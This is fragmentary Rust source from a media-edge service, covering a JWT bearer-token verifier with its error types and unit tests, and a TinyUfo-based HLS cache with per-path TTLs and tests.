std::fmt::Result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AuthError::MissingHeader =&gt; write!(f, "Missing authorization header"),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AuthError::InvalidFormat =&gt; write!(f, "Invalid token format"),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AuthError::TokenExpired =&gt; write!(f, "Token expired"),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AuthError::ValidationFailed(msg) =&gt; write!(f, "Validation failed: {}", msg),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std::error::Error for AuthError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From&lt;AuthError&gt; for MediaEdgeError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from(err: AuthError)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MediaEdgeError::Auth(err.to_string())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JWT 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JwtVerifier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decoding_key: DecodingKey,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validation: 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JwtVerifier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JWT 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`secret` - The JWT secret (must match Python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`algorithm` - Algorithm string (e.g., "HS256")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new(secret: &amp;str, algorithm: &amp;str)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algo = match algorithm.to_uppercase().as_str()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"HS256" =&gt; Algorithm::HS256,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"HS384" =&gt; Algorithm::HS384,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"HS512" =&gt; Algorithm::HS512,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"RS256" =&gt; Algorithm::RS256,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"RS384" =&gt; Algorithm::RS384,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"RS512" =&gt; Algorithm::RS512,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warn!(algorithm = algorithm, "Unknown algorithm, defaulting to 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Algorithm::HS256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validation = Validation::new(algo);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validation.validate_exp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validation.leeway = 60; // 60 second leeway for clock skew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decoding_key: DecodingKey::from_secret(secret.as_bytes()),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Verify a JWT token from Authorization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`auth_header` - The full Authorization header value (e.g., "Bearer eyJ...")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decoded claims if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verify(&amp;self, auth_header: &amp;str) -&gt; std::result::Result&lt;Claims, AuthError&gt;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 token from "Bearer &lt;token&gt;"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auth_header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.strip_prefix("Bearer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.or_else(|| auth_header.strip_prefix("bearer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.ok_or(AuthError::InvalidFormat)?;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Decode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token_data = decode::&lt;Claims&gt;(token, &amp;self.decoding_key, &amp;self.validation)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debug!(error = %e, "JWT verification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e.to_string().contains("expired")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AuthError::TokenExpired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AuthError::ValidationFailed(e.to_string())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debug!(user_id = %token_data.claims.sub, "JWT verified successfully");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Ok(token_data.claims)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Extract user ID from Authorization header (if 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get_user_id(&amp;self, auth_header: &amp;str)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self.verify(auth_header).ok().map(|claims| claims.sub)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JWT verifier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JwtHandle = Arc&lt;JwtVerifier&gt;;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JWT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create_jwt_verifier(secret: &amp;str, algorithm: &amp;str) -&gt; JwtHandle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Arc::new(JwtVerifier::new(secret, algorithm))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jsonwebtoken::{encode, EncodingKey, Header};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create_test_token(secret: &amp;str, exp_offset: i64)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exp = (chrono::Utc::now().timestamp() + exp_offset) as usize;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claims = Claims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sub: "test_user".to_string(),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jti: "test_jti".to_string(),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token_type: Some("access".to_string()),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iat: Some((chrono::Utc::now().timestamp()) as usize),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&amp;Header::default(),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&amp;claims,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&amp;EncodingKey::from_secret(secret.as_bytes()),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test_valid_token()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secret = "test_secret";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verifier = JwtVerifier::new(secret, "HS256");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create_test_token(secret, 3600); // Valid for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verifier.verify(&amp;format!("Bearer {}", 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assert_eq!(result.unwrap().sub, "test_user");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test_expired_token()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secret = "test_secret";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verifier = JwtVerifier::new(secret, "HS256");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create_test_token(secret, -3600); // Expired 1 hour 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verifier.verify(&amp;format!("Bearer {}", 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Err(AuthError::TokenExpired)));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test_invalid_format()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verifier = JwtVerifier::new("secret", "HS256");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verifier.verify("InvalidHeader");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Err(AuthError::InvalidFormat)));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apps/aiyou_stack/aiyou-fastapi-services/media-edge/src/auth.rs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apps/aiyou_stack/aiyou-fastapi-services/media-edge/src/cache.rs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TinyUfo-based caching layer for HLS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TinyUfo provides O(1) lookup with adaptive eviction,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better than LRU for streaming workloads.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bytes::Bytes;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std::time::{Duration, Instant};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tinyufo::TinyUfo;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Cached entry with TTL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CacheEntry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content_type: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inserted_at: Instant,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size_bytes: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TinyUfo-based media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MediaCache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 TinyUfo&lt;String, CacheEntry&gt;,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ttl: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max_size_bytes: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segment_ttl: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playlist_ttl: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MediaCache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cache with specified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`capacity_mb` - Maximum cache size in megabytes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`ttl_seconds` - Default TTL for cached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new(capacity_mb: usize, ttl_seconds: u64)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Estimate ~100KB per HLS segment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estimated_entries = (capacity_mb * 1024) /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max_size_bytes = capacity_mb * 1024 * 1024;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capacity_mb = capacity_mb,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estimated_entries = estimated_entries,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"Initializing TinyUfo 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cache: TinyUfo::new(estimated_entries, estimated_entries),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ttl: Duration::from_secs(ttl_seconds),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segment_ttl: Duration::from_secs(86400), // 24 hours for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playlist_ttl: Duration::from_secs(3600), // 1 hour for playlists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TTL based on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get_ttl_for_path(&amp;self, path: &amp;str) -&gt; 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path.ends_with(".m3u8")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self.playlist_ttl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path.ends_with(".ts") || path.ends_with(".m4s")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self.segment_ttl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an entry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None if not found or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get(&amp;self, key: &amp;str) -&gt; Option&lt;(Bytes, String)&gt;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ttl = self.get_ttl_for_path(key);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self.cache.get(&amp;key.to_string()).and_then(|entry|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entry.inserted_at.elapsed() &lt; ttl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debug!(key = key, "Cache HIT");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Some((entry.data.clone(), entry.content_type.clone()))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debug!(key = key, "Cache EXPIRED");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Insert an entry into the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insert(&amp;self, key: String, data: Bytes, content_type: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size_bytes = data.len();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entry = CacheEntry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inserted_at: Instant::now(),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Weight based on size (1 weight unit = ~10KB)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weight = std::cmp::max(1, size_bytes / 10240);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size_bytes = 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 INSERT"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self.cache.put(key, entry, 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key exists (without checking expiration)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contains(&amp;self, key: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self.cache.get(&amp;key.to_string()).is_some()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stats(&amp;self) -&gt; CacheStats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max_size_bytes: self.max_size_bytes,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ttl_seconds: self.ttl.as_secs(),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segment_ttl_seconds: self.segment_ttl.as_secs(),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playlist_ttl_seconds: self.playlist_ttl.as_secs(),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Cache statistics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CacheStats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max_size_bytes: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ttl_seconds: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segment_ttl_seconds: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playlist_ttl_seconds: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cache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CacheHandle = Arc&lt;MediaCache&gt;;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cache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create_cache(capacity_mb: usize, ttl_seconds: u64) -&gt; CacheHandle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Arc::new(MediaCache::new(capacity_mb, ttl_seconds))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test_cache_insert_get()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 = MediaCache::new(1, 3600);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Bytes::from("test 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"test.ts".to_string(),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"video/mp2t".to_string(),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cache.get("test.ts");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assert!(result.is_some());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(cached_data, content_type) = result.unwrap();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assert_eq!(cached_data,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assert_eq!(content_type, "video/mp2t");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test_cache_miss()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 = MediaCache::new(1, 3600);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cache.get("nonexistent.ts");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apps/aiyou_stack/aiyou-fastapi-services/media-edge/src/cache.rs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2026-04-23T21:44:41.202Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T21:44:41.202Z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